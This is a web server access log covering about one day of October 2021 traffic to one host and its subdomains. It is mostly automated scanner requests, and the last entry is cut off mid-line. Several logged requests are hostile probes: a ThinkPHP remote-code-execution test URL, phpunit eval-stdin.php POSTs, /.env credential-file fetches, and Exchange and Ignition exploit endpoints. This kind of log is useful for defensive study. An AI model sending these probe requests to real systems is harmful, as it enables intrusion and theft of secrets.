"-" [21/Oct/2021:00:18:18 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 209.97.179.197] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:18 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 209.97.179.197] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:19 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 209.97.179.197] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:19 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 209.97.179.197] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:20 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 209.97.179.197] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:21 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 209.97.179.197] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:21 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 209.97.179.197] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [21/Oct/2021:00:18:21 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 209.97.179.197] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [21/Oct/2021:00:18:22 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 209.97.179.197] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:22 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 209.97.179.197] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:01:38:23 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:01:51:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Oct/2021:02:54:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:04:17:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [21/Oct/2021:04:17:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [21/Oct/2021:04:17:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [21/Oct/2021:04:46:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.4] [Length 0] [Gzip -] "-" "-" [21/Oct/2021:04:51:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [21/Oct/2021:05:04:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:05:04:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:05:06:33 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:05:22:50 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:05:31:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Oct/2021:06:19:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:06:33:31 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [21/Oct/2021:06:33:32 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [21/Oct/2021:06:40:03 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:06:40:03 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:07:58:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 107.172.168.182] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36" "-" [21/Oct/2021:08:09:22 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.203.209] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:10:22:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:10:30:53 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:10:35:03 +0000] 400 - GET https localhost "/9Wff" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [21/Oct/2021:10:38:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Oct/2021:11:10:09 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:11:16:55 +0000] 400 - GET http 64.22.31.253 "/secure/Dashboard.jspa" [Client 121.46.25.189] [Length 654] [Gzip -] "like Gecko) Chrome/17.0.963.56 Safari/535.11\x22" "-" [21/Oct/2021:11:16:58 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "2.0.1) Gecko/20100101 Firefox/4.0.1\x22" "-" [21/Oct/2021:11:17:33 +0000] 444 - GET https 64.22.31.253 "/secure/Dashboard.jspa" [Client 121.46.25.189] [Length 0] [Gzip -] "\x22Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML" "-" [21/Oct/2021:11:17:35 +0000] 444 - GET https 64.22.31.253 "/login.action" [Client 121.46.25.189] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [21/Oct/2021:11:17:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 121.46.25.189] [Length 0] [Gzip -] "\x22Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML" "-" [21/Oct/2021:11:17:41 +0000] 444 - GET https 64.22.31.253 "/login.action" [Client 121.46.25.189] [Length 0] [Gzip -] "\x22Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML" "-" [21/Oct/2021:11:17:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 121.46.25.189] [Length 0] [Gzip -] "like Gecko) Version/5.1 Safari/534.50\x22" "-" [21/Oct/2021:11:27:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.19] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [21/Oct/2021:12:33:06 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:07 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:08 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:08 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:09 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:09 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [21/Oct/2021:12:33:10 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:11 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:11 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:12 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Oct/2021:12:33:17 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [21/Oct/2021:12:50:52 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:12:50:53 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:13:06:28 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.85] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:13:09:08 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:13:09:09 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:13:54:51 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:13:54:52 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:14:57:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Oct/2021:15:03:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:16:00:29 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 13.48.13.76] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [21/Oct/2021:16:17:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.159] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [21/Oct/2021:16:18:02 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 64.27.17.140] [Length 0] [Gzip -] "-" "-" [21/Oct/2021:16:18:03 +0000] 400 - - https localhost "-" [Client 64.27.17.140] [Length 154] [Gzip -] "-" "-" [21/Oct/2021:16:18:07 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.166] [Length 0] [Gzip -] "-" "-" [21/Oct/2021:16:18:13 +0000] 400 - - https localhost "-" [Client 23.129.64.166] [Length 154] [Gzip -] "-" "-" [21/Oct/2021:16:28:29 +0000] 400 - - http localhost "-" [Client 79.124.62.106] [Length 154] [Gzip -] "-" "-" [21/Oct/2021:16:49:37 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:16:49:38 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:17:31:36 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:17:31:37 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:17:37:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Oct/2021:18:25:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.232.185.37] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:19:44:44 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:19:44:44 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:20:10:58 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.215.50.90] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Oct/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Oct/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Oct/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Oct/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Oct/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Oct/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Oct/2021:20:48:24 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:20:48:24 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:22:38:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Oct/2021:23:43:22 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Oct/2021:23:43:23 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:00:32:44 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:01:25:12 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:01:25:12 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:01:39:25 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:02:49:37 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:03:37:47 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Oct/2021:04:32:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.158.118.231] [Length 0] [Gzip -] "-" "-" [22/Oct/2021:04:32:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.158.118.231] [Length 0] [Gzip -] "-" "-" [22/Oct/2021:05:02:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:05:03:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.104.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:05:06:03 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:05:40:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.68] [Length 0] [Gzip -] "-" "-" [22/Oct/2021:05:45:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:41 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:43 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:43 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:45 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:45 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [22/Oct/2021:05:45:46 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:46 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:49 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:49 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 